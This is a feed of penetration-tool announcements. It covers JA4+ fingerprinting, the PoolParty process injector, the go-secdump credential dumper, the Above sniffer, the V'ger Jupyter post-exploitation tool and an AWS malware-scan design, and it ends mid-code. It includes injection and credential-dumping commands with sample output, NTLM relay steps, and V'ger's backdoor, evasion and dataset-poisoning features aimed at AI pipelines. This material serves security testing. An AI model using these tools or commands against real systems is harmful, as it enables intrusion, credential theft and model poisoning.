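    a, _b, c = fp.split("_")
    return f"{a}_{c}"
```

Applied to the Chrome example fingerprint from this page, `ja4_ac("t13d1516h2_8daaf6152771_02713d6af862")` yields `t13d1516h2_02713d6af862`, which stays stable even if the actor rotates the cipher-dependent b section.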

    Current methods and implementation details:
    | Full Name | Short Name | Description |
    |---|---|---|
    | JA4 | JA4 | TLS Client Fingerprinting |
    | JA4Server | JA4S | TLS Server Response / Session Fingerprinting |
    | JA4HTTP | JA4H | HTTP Client Fingerprinting |
    | JA4Latency | JA4L | Latency Measurement / Light Distance |
    | JA4X509 | JA4X | X509 TLS Certificate Fingerprinting |
    | JA4SSH | JA4SSH | SSH Traffic Fingerprinting |
    | JA4TCP | JA4T | TCP Client Fingerprinting |
    | JA4TCPServer | JA4TS | TCP Server Response Fingerprinting |
    | JA4TCPScan | JA4TScan | Active TCP Fingerprint Scanner |

    The full name or short name can be used interchangeably. Additional JA4+ methods are in the works...

    To understand how to read JA4+ fingerprints, see Technical Details

    Licensing

    JA4: TLS Client Fingerprinting is open-source, BSD 3-Clause, same as JA3. FoxIO does not have patent claims and is not planning to pursue patent coverage for JA4 TLS Client Fingerprinting. This allows any company or tool currently utilizing JA3 to immediately upgrade to JA4 without delay.

    JA4S, JA4L, JA4H, JA4X, JA4SSH, JA4T, JA4TScan and all future additions, (collectively referred to as JA4+) are licensed under the FoxIO License 1.1. This license is permissive for most use cases, including for academic and internal business purposes, but is not permissive for monetization. If, for example, a company would like to use JA4+ internally to help secure their own company, that is permitted. If, for example, a vendor would like to sell JA4+ fingerprinting as part of their product offering, they would need to request an OEM license from us.

    All JA4+ methods are patent pending.
    JA4+ is a trademark of FoxIO

    JA4+ can and is being implemented into open source tools, see the License FAQ for details.

    This licensing allows us to provide JA4+ to the world in a way that is open and immediately usable, but also provides us with a way to fund continued support, research into new methods, and the development of the upcoming JA4 Database. We want everyone to have the ability to utilize JA4+ and are happy to work with vendors and open source projects to help make that happen.

    ja4plus-mapping.csv is not included in the above software licenses and is thereby a license-free file.

    Q&A

    Q: Why are you sorting the ciphers? Doesn't the ordering matter?
    A: It does but in our research we've found that applications and libraries choose a unique cipher list more than unique ordering. This also reduces the effectiveness of "cipher stunting," a tactic of randomizing cipher ordering to prevent JA3 detection.
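The point about sorting can be demonstrated in a few lines: an order-insensitive fingerprint input is unchanged by "cipher stunting" (randomized cipher ordering). This is a simplified illustration of the principle, not the actual JA4 hashing pipeline:

```python
import random

def cipher_fingerprint(ciphers):
    """Order-insensitive fingerprint input: sorting the cipher list
    neutralizes randomized ordering ('cipher stunting')."""
    return ",".join(sorted(ciphers))

# A randomly shuffled copy of the same cipher list...
base = ["1301", "1302", "1303", "c02b", "c02f"]
shuffled = random.sample(base, k=len(base))
```

However the client permutes `base`, `cipher_fingerprint(shuffled)` equals `cipher_fingerprint(base)`, so the resulting fingerprint stays stable.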

    Q: Why are you sorting the extensions?
    A: Earlier in 2023, Google updated Chromium browsers to randomize their extension ordering. Much like cipher stunting, this was a tactic to prevent JA3 detection and "make the TLS ecosystem more robust to changes." Google was worried server implementers would assume the Chrome fingerprint would never change and end up building logic around it, which would cause issues whenever Google went to update Chrome.

    So I want to make this clear: JA4 fingerprints will change as application TLS libraries are updated, about once a year. Do not assume fingerprints will remain constant in an environment where applications are updated. In any case, sorting the extensions gets around this and adding in Signature Algorithms preserves uniqueness.

    Q: Doesn't TLS 1.3 make fingerprinting TLS clients harder?
    A: No, it makes it easier! Since TLS 1.3, clients have had a much larger set of extensions and even though TLS1.3 only supports a few ciphers, browsers and applications still support many more.

    JA4+ was created by:

    John Althouse, with feedback from:

    Josh Atkins
    Jeff Atkinson
    Joshua Alexander
    W.
    Joe Martin
    Ben Higgins
    Andrew Morris
    Chris Ueland
    Ben Schofield
    Matthias Vallentin
    Valeriy Vorotyntsev
    Timothy Noel
    Gary Lipsky
    And engineers working at GreyNoise, Hunt, Google, ExtraHop, F5, Driftnet and others.

    Contact John Althouse at john@foxio.io for licensing and questions.

    Copyright (c) 2024, FoxIO



    KitPloit - PenTest Tools!

    PoolParty - A Set Of Fully-Undetectable Process Injection Techniques Abusing Windows Thread Pools

    By: Zion3R β€” May 24th 2024 at 12:30


    A collection of fully-undetectable process injection techniques abusing Windows Thread Pools. Presented at Black Hat EU 2023 Briefings under the title - The Pool Party You Will Never Forget: New Process Injection Techniques Using Windows Thread Pools


    PoolParty Variants

    Variant ID Variant Description
    1 Overwrite the start routine of the target worker factory
    2 Insert TP_WORK work item to the target process's thread pool
    3 Insert TP_WAIT work item to the target process's thread pool
    4 Insert TP_IO work item to the target process's thread pool
    5 Insert TP_ALPC work item to the target process's thread pool
    6 Insert TP_JOB work item to the target process's thread pool
    7 Insert TP_DIRECT work item to the target process's thread pool
    8 Insert TP_TIMER work item to the target process's thread pool

    Usage

    PoolParty.exe -V <VARIANT ID> -P <TARGET PID>

    Usage Examples

    Insert TP_TIMER work item to process ID 1234

    >> PoolParty.exe -V 8 -P 1234

    [info] Starting PoolParty attack against process id: 1234
    [info] Retrieved handle to the target process: 00000000000000B8
    [info] Hijacked worker factory handle from the target process: 0000000000000058
    [info] Hijacked timer queue handle from the target process: 0000000000000054
    [info] Allocated shellcode memory in the target process: 00000281DBEF0000
    [info] Written shellcode to the target process
    [info] Retrieved target worker factory basic information
    [info] Created TP_TIMER structure associated with the shellcode
    [info] Allocated TP_TIMER memory in the target process: 00000281DBF00000
    [info] Written the specially crafted TP_TIMER structure to the target process
    [info] Modified the target process's TP_POOL timer queue list entry to point to the specially crafted TP_TIMER
    [info] Set the timer queue to expire to trigger the dequeueing TppTimerQueueExpiration
    [info] PoolParty attack completed successfully

    Default Shellcode and Customization

    The default shellcode spawns a calculator via the WinExec API.

    To customize the executable to execute, change the path at the end of the g_Shellcode variable in the main.cpp file.

    Author - Alon Leviev



    KitPloit - PenTest Tools!

    Go-Secdump - Tool To Remotely Dump Secrets From The Windows Registry

    By: Zion3R β€” May 23rd 2024 at 12:30


    Package go-secdump is a tool built to remotely extract hashes from the SAM registry hive as well as LSA secrets and cached hashes from the SECURITY hive without any remote agent and without touching disk.

    The tool is built on top of the library go-smb and uses it to communicate with the Windows Remote Registry to retrieve registry keys directly from memory.

    It was built as a learning experience and as a proof of concept that it should be possible to remotely retrieve the NT Hashes from the SAM hive and the LSA secrets as well as domain cached credentials without having to first save the registry hives to disk and then parse them locally.

    The main problem to overcome was that the SAM and SECURITY hives are only readable by NT AUTHORITY\SYSTEM. However, I noticed that the local group administrators had the WriteDACL permission on the registry hives and could thus be used to temporarily grant read access to itself to retrieve the secrets and then restore the original permissions.


    Credits

    Much of the code in this project is inspired/taken from Impacket's secdump but converted to access the Windows registry remotely and to only access the required registry keys.

    Some of the other sources that have been useful to understanding the registry structure and encryption methods are listed below:

    https://www.passcape.com/index.php?section=docsys&cmd=details&id=23

    http://www.beginningtoseethelight.org/ntsecurity/index.htm

    https://social.technet.microsoft.com/Forums/en-US/6e3c4486-f3a1-4d4e-9f5c-bdacdb245cfd/how-are-ntlm-hashes-stored-under-the-v-key-in-the-sam?forum=win10itprogeneral

    Usage

    Usage: ./go-secdump [options]

    options:
    --host <target> Hostname or ip address of remote server
    -P, --port <port> SMB Port (default 445)
    -d, --domain <domain> Domain name to use for login
    -u, --user <username> Username
    -p, --pass <pass> Password
    -n, --no-pass Disable password prompt and send no credentials
    --hash <NT Hash> Hex encoded NT Hash for user password
    --local Authenticate as a local user instead of domain user
    --dump Saves the SAM and SECURITY hives to disk and
    transfers them to the local machine.
    --sam Extract secrets from the SAM hive explicitly. Only other explicit targets are included.
    --lsa Extract LSA secrets explicitly. Only other explicit targets are included.
    --dcc2 Extract DCC2 caches explicitly. Only other explicit targets are included.
    --backup-dacl Save original DACLs to disk before modification
    --restore-dacl Restore DACLs using disk backup. Could be useful if automated restore fails.
    --backup-file Filename for DACL backup (default dacl.backup)
    --relay Start an SMB listener that will relay incoming
    NTLM authentications to the remote server and
    use that connection. NOTE that this forces SMB 2.1
    without encryption.
    --relay-port <port> Listening port for relay (default 445)
    --socks-host <target> Establish connection via a SOCKS5 proxy server
    --socks-port <port> SOCKS5 proxy port (default 1080)
    -t, --timeout Dial timeout in seconds (default 5)
    --noenc Disable smb encryption
    --smb2 Force smb 2.1
    --debug Enable debug logging
    --verbose Enable verbose logging
    -o, --output Filename for writing results (default is stdout). Will append to file if it exists.
    -v, --version Show version

    Changing DACLs

    go-secdump will automatically try to modify and then restore the DACLs of the required registry keys. However, if something goes wrong during the restoration part such as a network disconnect or other interrupt, the remote registry will be left with the modified DACLs.

    Using the --backup-dacl argument it is possible to store a serialized copy of the original DACLs before modification. If a connectivity problem occurs, the DACLs can later be restored from file using the --restore-dacl argument.
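The back-up/modify/restore flow described above follows a classic try/finally pattern. The sketch below illustrates that control flow with abstract callbacks (the function and parameter names are hypothetical; go-secdump itself is written in Go against the real Windows remote-registry APIs):

```python
def read_with_temp_dacl(key, read_secret, save_backup, grant_read, restore):
    """Sketch of the DACL dance: back up the original DACL, grant ourselves
    read access, read the hive, and restore the DACL even if the read fails.
    (A disk backup, as with --backup-dacl, covers crashes and disconnects
    where even the finally block never runs.)"""
    original = save_backup(key)     # serialized copy of the original DACL
    grant_read(key)                 # temporarily grant read via WriteDACL
    try:
        return read_secret(key)
    finally:
        restore(key, original)      # best-effort restoration of the DACL
```

The finally block guarantees restoration on ordinary errors; the serialized backup on disk is what makes later `--restore-dacl` recovery possible when the process dies mid-run.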

    Examples

    Dump all registry secrets

    ./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local
    or
    ./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam --lsa --dcc2

    Dump only SAM, LSA, or DCC2 cache secrets

    ./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam
    ./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --lsa
    ./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --dcc2

    NTLM Relaying

    Dump registry secrets using NTLM relaying

    Start listener

    ./go-secdump --host 192.168.0.100 -n --relay

    Trigger an auth to your machine from a client with administrative access to 192.168.0.100 somehow and then wait for the dumped secrets.

    YYYY/MM/DD HH:MM:SS smb [Notice] Client connected from 192.168.0.30:49805
    YYYY/MM/DD HH:MM:SS smb [Notice] Client (192.168.0.30:49805) successfully authenticated as (domain.local\Administrator) against (192.168.0.100:445)!
    Net-NTLMv2 Hash: Administrator::domain.local:34f4533b697afc39:b4dcafebabedd12deadbeeffef1cea36:010100000deadbeef59d13adc22dda0
    2023/12/13 14:47:28 [Notice] [+] Signing is NOT required
    2023/12/13 14:47:28 [Notice] [+] Login successful as domain.local\Administrator
    [*] Dumping local SAM hashes
    Name: Administrator
    RID: 500
    NT: 2727D7906A776A77B34D0430EAACD2C5

    Name: Guest
    RID: 501
    NT: <empty>

    Name: DefaultAccount
    RID: 503
    NT: <empty>

    Name: WDAGUtilityAccount
    RID: 504
    NT: <empty>

    [*] Dumping LSA Secrets
    [*] $MACHINE.ACC
    $MACHINE.ACC: 0x15deadbeef645e75b38a50a52bdb67b4
    $MACHINE.ACC:plain_password_hex:47331e26f48208a7807cafeababe267261f79fdc 38c740b3bdeadbeef7277d696bcafebabea62bb5247ac63be764401adeadbeef4563cafebabe43692deadbeef03f...
    [*] DPAPI_SYSTEM
    dpapi_machinekey: 0x8afa12897d53deadbeefbd82593f6df04de9c100
    dpapi_userkey: 0x706e1cdea9a8a58cafebabe4a34e23bc5efa8939
    [*] NL$KM
    NL$KM: 0x53aa4b3d0deadbeef42f01ef138c6a74
    [*] Dumping cached domain credentials (domain/username:hash)
    DOMAIN.LOCAL/Administrator:$DCC2$10240#Administrator#97070d085deadbeef22cafebabedd1ab
    ...

    SOCKS Proxy

    Dump secrets using an upstream SOCKS5 proxy either for pivoting or to take advantage of Impacket's ntlmrelayx.py SOCKS server functionality.

    When using ntlmrelayx.py as the upstream proxy, the provided username must match that of the authenticated client, but the password can be empty.

    ./ntlmrelayx.py -socks -t 192.168.0.100 -smb2support --no-http-server --no-wcf-server --no-raw-server
    ...

    ./go-secdump --host 192.168.0.100 --user Administrator -n --socks-host 127.0.0.1 --socks-port 1080


    KitPloit - PenTest Tools!

    Above - Invisible Network Protocol Sniffer

    By: Zion3R β€” May 22nd 2024 at 12:30


    Invisible protocol sniffer for finding vulnerabilities in the network. Designed for pentesters and security engineers.


    Above: Invisible network protocol sniffer
    Designed for pentesters and security engineers

    Author: Magama Bazarov, <caster@exploit.org>
    Pseudonym: Caster
    Version: 2.6
    Codename: Introvert

    Disclaimer

    All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.

    It is a specialized network security tool that helps both pentesters and security professionals.

    Mechanics

    Above is an invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it does not make any noise on the air. It is invisible, and completely based on the Scapy library.

    Above allows pentesters to automate the process of finding vulnerabilities in network hardware. Discovery protocols, dynamic routing, 802.1Q, ICS Protocols, FHRP, STP, LLMNR/NBT-NS, etc.

    Supported protocols

    Detects up to 27 protocols:

    MACSec (802.1X AE)
    EAPOL (Checking 802.1X versions)
    ARP (Passive ARP, Host Discovery)
    CDP (Cisco Discovery Protocol)
    DTP (Dynamic Trunking Protocol)
    LLDP (Link Layer Discovery Protocol)
    802.1Q Tags (VLAN)
    S7COMM (Siemens)
    OMRON
    TACACS+ (Terminal Access Controller Access Control System Plus)
    ModbusTCP
    STP (Spanning Tree Protocol)
    OSPF (Open Shortest Path First)
    EIGRP (Enhanced Interior Gateway Routing Protocol)
    BGP (Border Gateway Protocol)
    VRRP (Virtual Router Redundancy Protocol)
    HSRP (Hot Standby Router Protocol)
    GLBP (Gateway Load Balancing Protocol)
    IGMP (Internet Group Management Protocol)
    LLMNR (Link Local Multicast Name Resolution)
    NBT-NS (NetBIOS Name Service)
    MDNS (Multicast DNS)
    DHCP (Dynamic Host Configuration Protocol)
    DHCPv6 (Dynamic Host Configuration Protocol v6)
    ICMPv6 (Internet Control Message Protocol v6)
    SSDP (Simple Service Discovery Protocol)
    MNDP (MikroTik Neighbor Discovery Protocol)

    Operating Mechanism

    Above works in two modes:

    • Hot mode: Sniffing on your interface specifying a timer
    • Cold mode: Analyzing traffic dumps

    The tool is very simple in its operation and is driven by arguments:

    • Interface: Specifying the network interface on which sniffing will be performed
    • Timer: Time during which traffic analysis will be performed
    • Input: The tool takes an already prepared .pcap as input and looks for protocols in it
    • Output: Above will record the listened traffic to .pcap file, its name you specify yourself
    • Passive ARP: Detecting hosts in a segment using Passive ARP
    usage: above.py [-h] [--interface INTERFACE] [--timer TIMER] [--output OUTPUT] [--input INPUT] [--passive-arp]

    options:
    -h, --help show this help message and exit
    --interface INTERFACE
    Interface for traffic listening
    --timer TIMER Time in seconds to capture packets, if not set capture runs indefinitely
    --output OUTPUT File name where the traffic will be recorded
    --input INPUT File name of the traffic dump
    --passive-arp Passive ARP (Host Discovery)

    Information about protocols

    The information obtained will be useful not only to the pentester but also to the security engineer, who will know what to pay attention to.

    When Above detects a protocol, it outputs the necessary information to indicate the attack vector or security issue:

    • Impact: What kind of attack can be performed on this protocol;

    • Tools: What tool can be used to launch an attack;

    • Technical information: Required information for the pentester, sender MAC/IP addresses, FHRP group IDs, OSPF/EIGRP domains, etc.

    • Mitigation: Recommendations for fixing the security problems

    • Source/Destination Addresses: For protocols, Above displays information about the source and destination MAC addresses and IP addresses


    Installation

    Linux

    You can install Above directly from the Kali Linux repositories

    caster@kali:~$ sudo apt update && sudo apt install above

    Or...

    caster@kali:~$ sudo apt-get install python3-scapy python3-colorama python3-setuptools
    caster@kali:~$ git clone https://github.com/casterbyte/Above
    caster@kali:~$ cd Above/
    caster@kali:~/Above$ sudo python3 setup.py install

    macOS:

    # Install python3 first
    brew install python3
    # Then install required dependencies
    sudo pip3 install scapy colorama setuptools

    # Clone the repo
    git clone https://github.com/casterbyte/Above
    cd Above/
    sudo python3 setup.py install

    Don't forget to deactivate your firewall on macOS!

    Settings > Network > Firewall


    How to Use

    Hot mode

    Above requires root access for sniffing

    Above can be run with or without a timer:

    caster@kali:~$ sudo above --interface eth0 --timer 120

    To stop traffic sniffing, press CTRL + C

    WARNING! Above is not designed to work with tunnel interfaces (L3) due to its use of filters for L2 protocols. The tool may not work properly on tunneled L3 interfaces.

    Example:

    caster@kali:~$ sudo above --interface eth0 --timer 120

    -----------------------------------------------------------------------------------------
    [+] Start sniffing...

    [*] After the protocol is detected - all necessary information about it will be displayed
    --------------------------------------------------
    [+] Detected SSDP Packet
    [*] Attack Impact: Potential for UPnP Device Exploitation
    [*] Tools: evil-ssdp
    [*] SSDP Source IP: 192.168.0.251
    [*] SSDP Source MAC: 02:10:de:64:f2:34
    [*] Mitigation: Ensure UPnP is disabled on all devices unless absolutely necessary, monitor UPnP traffic
    --------------------------------------------------
    [+] Detected MDNS Packet
    [*] Attack Impact: MDNS Spoofing, Credentials Interception
    [*] Tools: Responder
    [*] MDNS Spoofing works specifically against Windows machines
    [*] You cannot get NetNTLMv2-SSP from Apple devices
    [*] MDNS Speaker IP: fe80::183f:301c:27bd:543
    [*] MDNS Speaker MAC: 02:10:de:64:f2:34
    [*] Mitigation: Filter MDNS traffic. Be careful with MDNS filtering
    --------------------------------------------------

    If you need to record the sniffed traffic, use the --output argument

    caster@kali:~$ sudo above --interface eth0 --timer 120 --output above.pcap

    If you interrupt the tool with CTRL+C, the traffic is still written to the file

    Cold mode

    If you already have some recorded traffic, you can use the --input argument to look for potential security issues

    caster@kali:~$ above --input ospf-md5.cap

    Example:

    caster@kali:~$ sudo above --input ospf-md5.cap

    [+] Analyzing pcap file...

    --------------------------------------------------
    [+] Detected OSPF Packet
    [+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
    [*] Tools: Loki, Scapy, FRRouting
    [*] OSPF Area ID: 0.0.0.0
    [*] OSPF Neighbor IP: 10.0.0.1
    [*] OSPF Neighbor MAC: 00:0c:29:dd:4c:54
    [!] Authentication: MD5
    [*] Tools for bruteforce: Ettercap, John the Ripper
    [*] OSPF Key ID: 1
    [*] Mitigation: Enable passive interfaces, use authentication
    --------------------------------------------------
    [+] Detected OSPF Packet
    [+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
    [*] Tools: Loki, Scapy, FRRouting
    [*] OSPF Area ID: 0.0.0.0
    [*] OSPF Neighbor IP: 192.168.0.2
    [*] OSPF Neighbor MAC: 00:0c:29:43:7b:fb
    [!] Authentication: MD5
    [*] Tools for bruteforce: Ettercap, John the Ripper
    [*] OSPF Key ID: 1
    [*] Mitigation: Enable passive interfaces, use authentication
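Before analysis, a cold-mode tool can cheaply validate its --input file by checking the capture's magic number, which distinguishes classic pcap, nanosecond pcap, and pcapng files. A sketch of that check (Above may do this differently internally):

```python
# Sketch: identify a capture file format from its first four bytes before
# handing it to the analysis engine.
MAGICS = {
    b"\xd4\xc3\xb2\xa1": "pcap (little-endian, microseconds)",
    b"\xa1\xb2\xc3\xd4": "pcap (big-endian, microseconds)",
    b"\x4d\x3c\xb2\xa1": "pcap (little-endian, nanoseconds)",
    b"\xa1\xb2\x3c\x4d": "pcap (big-endian, nanoseconds)",
    b"\x0a\x0d\x0d\x0a": "pcapng",  # Section Header Block type 0x0A0D0D0A
}

def detect_capture_format(first_bytes):
    """Return a human-readable capture format name, or None if unknown."""
    return MAGICS.get(bytes(first_bytes[:4]))
```

Passing the first bytes of ospf-md5.cap through this function tells the tool whether it can parse the file at all before it starts looking for protocol packets.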

    Passive ARP

    The tool can detect hosts without noise in the air by processing ARP frames in passive mode

    caster@kali:~$ sudo above --interface eth0 --passive-arp --timer 10

    [+] Host discovery using Passive ARP

    --------------------------------------------------
    [+] Detected ARP Reply
    [*] ARP Reply for IP: 192.168.1.88
    [*] MAC Address: 00:00:0c:07:ac:c8
    --------------------------------------------------
    [+] Detected ARP Reply
    [*] ARP Reply for IP: 192.168.1.40
    [*] MAC Address: 00:0c:29:c5:82:81
    --------------------------------------------------
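Under the hood, passive ARP discovery only has to read two fields out of each observed ARP reply: the sender IP and the sender MAC. A minimal stdlib sketch of that parsing step (not Above's actual implementation):

```python
# Sketch: extract (sender IP, sender MAC) from a raw Ethernet frame carrying
# an ARP reply, without sending any packets on the wire.
import struct

def parse_arp_reply(frame):
    """Return (sender_ip, sender_mac) for an ARP reply frame, else None."""
    # 14-byte Ethernet header + 28-byte ARP payload minimum
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":  # EtherType 0x0806 = ARP
        return None
    opcode = struct.unpack("!H", frame[20:22])[0]
    if opcode != 2:                                     # opcode 2 = ARP reply
        return None
    sender_mac = ":".join(f"{b:02x}" for b in frame[22:28])
    sender_ip = ".".join(str(b) for b in frame[28:32])
    return sender_ip, sender_mac
```

Feeding each sniffed frame through a function like this yields exactly the "ARP Reply for IP / MAC Address" pairs shown in the output above.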

    Outro

    I wrote this tool because of the track "A View From Above (Remix)" by KOAN Sound. This track was everything to me when I was working on this sniffer.




KitPloit - PenTest Tools!

    Vger - An Interactive CLI Application For Interacting With Authenticated Jupyter Instances

    By: Zion3R β€” May 21st 2024 at 12:30

    V'ger is an interactive command-line application for post-exploitation of authenticated Jupyter instances with a focus on AI/ML security operations.

    User Stories

    • As a Red Teamer, you've found Jupyter credentials, but don't know what you can do with them. V'ger is organized in a format that should be intuitive for most offensive security professionals to help them understand the functionality of the target Jupyter server.
• As a Red Teamer, you know that some browser-based actions will be visible to the legitimate Jupyter users. For example, modifying tabs will appear in their workspace and commands entered in cells will be recorded to the history. V'ger decreases the likelihood of detection.
• As an AI Red Teamer, you understand academic algorithmic attacks, but need a more practical execution vector. For instance, you may need to modify a large, foundational internet-scale dataset as part of a model poisoning operation. Modifying that dataset at its source may be impossible or generate undesirable auditable artifacts. With V'ger you can achieve the same objectives in-memory, a significant improvement in tradecraft.
    • As a Blue Teamer, you want to understand logging and visibility into a live Jupyter deployment. V'ger can help you generate repeatable artifacts for testing instrumentation and performing incident response exercises.

    Usage

    Initial Setup

    1. pip install vger
    2. vger --help

    Currently, vger interactive has maximum functionality, maintaining state for discovered artifacts and recurring jobs. However, most functionality is also available by-name in non-interactive format with vger <module>. List available modules with vger --help.

    Commands

    Once a connection is established, users drop into a nested set of menus.

The top level menu is:
• Reset: Configure a different host.
• Enumerate: Utilities to learn more about the host.
• Exploit: Utilities to perform direct action and manipulation of the host and artifacts.
• Persist: Utilities to establish persistence mechanisms.
• Export: Save output to a text file.
• Quit: No one likes quitters.

These menus contain the following functionality:
• List modules: Identify imported modules in target notebooks to determine what libraries are available for injected code.
• Inject: Execute code in the context of the selected notebook. Code can be provided in a text editor or by specifying a local .py file. Either input is processed as a string and executed in the runtime of the notebook.
• Backdoor: Launch a new JupyterLab instance open to 0.0.0.0, with allow-root, on a user-specified port with a user-specified password.
• Check History: See ipython commands recently run in the target notebook.
• Run shell command: Spawn a terminal, run the command, return the output, and delete the terminal.
• List dir or get file: List directories relative to the Jupyter directory. If you don't know, start with /.
• Upload file: Upload a file from localhost to the target. Specify paths in the same format as List dir (relative to the Jupyter directory). Provide a full path including filename and extension.
• Delete file: Delete a file. Specify paths in the same format as List dir (relative to the Jupyter directory).
• Find models: Find models based on common file formats.
• Download models: Download discovered models.
• Snoop: Monitor notebook execution and results until timeout.
• Recurring jobs: Launch/Kill recurring snippets of code silently run in the target environment.
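Many of these modules boil down to authenticated calls against the Jupyter Server REST API. As an illustration, a directory listing maps naturally onto the documented /api/contents endpoint with token authentication; the host, token, and path below are made-up placeholders, and V'ger's actual request code may differ:

```python
# Hedged sketch: build an authenticated Jupyter /api/contents request, the
# kind of call a "List dir or get file" feature would issue. Values shown in
# the usage example are placeholders, not real credentials.
from urllib.parse import quote

def contents_request(base_url, token, path=""):
    """Return (url, headers) for a Jupyter contents-API listing request."""
    # /api/contents/<path> lists a directory or fetches a file's metadata
    url = f"{base_url.rstrip('/')}/api/contents/{quote(path.strip('/'))}"
    headers = {"Authorization": f"token {token}"}
    return url, headers
```

The resulting pair can be handed to urllib.request.Request or any HTTP client; starting with an empty path lists the Jupyter root directory, matching the "start with /" advice above.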

    Experimental

With pip install vger[ai] you'll get LLM-generated summaries of notebooks in the target environment. These are meant as a rough translation for non-DS/AI folks to quickly triage whether (and which) notebooks are worth investigating further.

There was an inherent tradeoff between model size and ability, and that's something I'll continue to tinker with, but hopefully this is helpful for some more traditional security users. I'd love to see folks start prompt injecting their notebooks ("these are not the droids you're looking for").

    Examples



KitPloit - PenTest Tools!

    Drs-Malware-Scan - Perform File-Based Malware Scan On Your On-Prem Servers With AWS

    By: Zion3R β€” May 20th 2024 at 12:30


    Perform malware scan analysis of on-prem servers using AWS services

    Challenges with on-premises malware detection

It can be difficult for security teams to continuously monitor all on-premises servers due to budget and resource constraints. Signature-based antivirus alone is insufficient, as modern malware uses various obfuscation techniques. Server admins may lack historical visibility into security events across all servers. Determining which systems are compromised, and which backups are safe to restore from during incidents, is challenging without centralized monitoring and alerting. It is onerous for server admins to set up and maintain additional security tools for advanced threat detection. A rapid mean time to detect and remediate infections is critical but difficult to achieve without the right automated solution.

    Determining which backup image is safe to restore from during incidents without comprehensive threat intelligence is another hard problem. Even if backups are available, without knowing when exactly a system got compromised, it is risky to blindly restore from backups. This increases the chance of restoring malware and losing even more valuable data and systems during incident response. There is a need for an automated solution that can pinpoint the timeline of infiltration and recommend safe backups for restoration.


    How to use AWS services to address these challenges

    The solution leverages AWS Elastic Disaster Recovery (AWS DRS), Amazon GuardDuty and AWS Security Hub to address the challenges of malware detection for on-premises servers.

This combination of services provides a cost-effective way to continuously monitor on-premises servers for malware without impacting performance. It also helps determine a safe point-in-time backup for restoration by identifying the timeline of compromise through centralized threat analytics.

    • AWS Elastic Disaster Recovery (AWS DRS) minimizes downtime and data loss with fast, reliable recovery of on-premises and cloud-based applications using affordable storage, minimal compute, and point-in-time recovery.

    • Amazon GuardDuty is a threat detection service that continuously monitors your AWS accounts and workloads for malicious activity and delivers detailed security findings for visibility and remediation.

    • AWS Security Hub is a cloud security posture management (CSPM) service that performs security best practice checks, aggregates alerts, and enables automated remediation.

    Architecture

    Solution description

    The Malware Scan solution assumes on-premises servers are already being replicated with AWS DRS, and Amazon GuardDuty & AWS Security Hub are enabled. The cdk stack in this repository will only deploy the boxes labelled as DRS Malware Scan in the architecture diagram.

    1. AWS DRS is replicating source servers from the on-premises environment to AWS (or from any cloud provider for that matter). For further details about setting up AWS DRS please follow the Quick Start Guide.
    2. Amazon GuardDuty is already enabled.
    3. AWS Security Hub is already enabled.
4. The Malware Scan solution is triggered by a Schedule Rule in Amazon EventBridge (with prefix DrsMalwareScanStack-ScheduleScanRule). You can adjust the scan frequency as needed (e.g. once a day, once a week).
    5. The Schedule Rule in Amazon EventBridge triggers the Submit Orders lambda function (with prefix DrsMalwareScanStack-SubmitOrders) which gathers the source servers to scan from the Source Servers DynamoDB table.
    6. Orders are placed on the SQS FIFO queue named Scan Orders (with prefix DrsMalwareScanStack-ScanOrdersfifo). The queue is used to serialize scan requests mapped to the same DRS instance, preventing a race condition.
7. The Process Order lambda picks a malware scan order from the queue and enriches it, preparing the upcoming malware scan operation. For instance, it inserts the id of the replicating DRS instance associated with the DRS source server provided in the order. The output of Process Order is a set of malware scan commands containing all the necessary information to invoke a GuardDuty malware scan.
    8. Malware scan operations are tracked using the DRSVolumeAnnotationsDDBTable at the volume-level, providing reporting capabilities.
    9. Malware scan commands are inserted in the Scan Commands SQS FIFO queue (with prefix DrsMalwareScanStack-ScanCommandsfifo) to increase resiliency.
    10. The Process Commands function submits queued scan commands at a maximum rate of 1 command per second to avoid API throttling. It triggers the on-demand malware scan function provided by Amazon GuardDuty.
    11. The execution of the on-demand Amazon GuardDuty Malware job can be monitored from the Amazon GuardDuty service.
12. The outcome of the malware scan job is routed to Amazon CloudWatch Logs.
    13. The Subscription Filter lambda function receives the outcome of the scan and tracks the result using DynamoDB (step #14).
    14. The DRS Instance Annotations DynamoDB Table tracks the status of the malware scan job at the instance level.
    15. The CDK stack named ScanReportStack deploys the Scan Report lambda function (with prefix ScanReportStack-ScanReport) to populate the Amazon S3 bucket with prefix scanreportstack-scanreportbucket.
    16. AWS Security Hub aggregates and correlates findings from Amazon GuardDuty.
17. The Security Hub finding event is caught by an EventBridge Rule (with prefix DrsMalwareScanStack-SecurityHubAnnotationsRule).
    18. The Security Hub Annotations lambda function (with prefix DrsMalwareScanStack-SecurityHubAnnotation) generates additional Notes (Annotations) to the Finding with contextualized information about the source server being affected. This additional information can be seen in the Notes section within the Security Hub Finding.
    19. The follow-up activities will depend on the incident response process being adopted. For example based on the date of the infection, AWS DRS can be used to perform a point in time recovery using a snapshot previous to the date of the malware infection.
    20. In a Multi-Account scenario, this solution can be deployed directly on the AWS account hosting the AWS DRS solution. The Amazon GuardDuty findings will be automatically sent to the centralized Security Account.
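Two details in steps 6 and 10 are worth sketching: the FIFO MessageGroupId keyed on the DRS instance id is what serializes scans per instance, and a simple pacing loop keeps submissions at 1 command per second. The function and field names below are illustrative, not the stack's actual code:

```python
# Hedged sketch of the queueing ideas in steps 6 and 10. Names are made up;
# the real stack's Lambda code may be structured differently.
import json
import time

def scan_order_message(source_server_id, drs_instance_id):
    """Build the kwargs an sqs.send_message call would take for a FIFO queue.
    Orders sharing a MessageGroupId are delivered in order, one at a time,
    which serializes scan requests mapped to the same DRS instance."""
    return {
        "MessageBody": json.dumps({"sourceServer": source_server_id,
                                   "instance": drs_instance_id}),
        "MessageGroupId": drs_instance_id,  # same instance -> serialized
        "MessageDeduplicationId": f"{source_server_id}-{drs_instance_id}",
    }

def submit_paced(commands, submit, min_interval=1.0, sleep=time.sleep):
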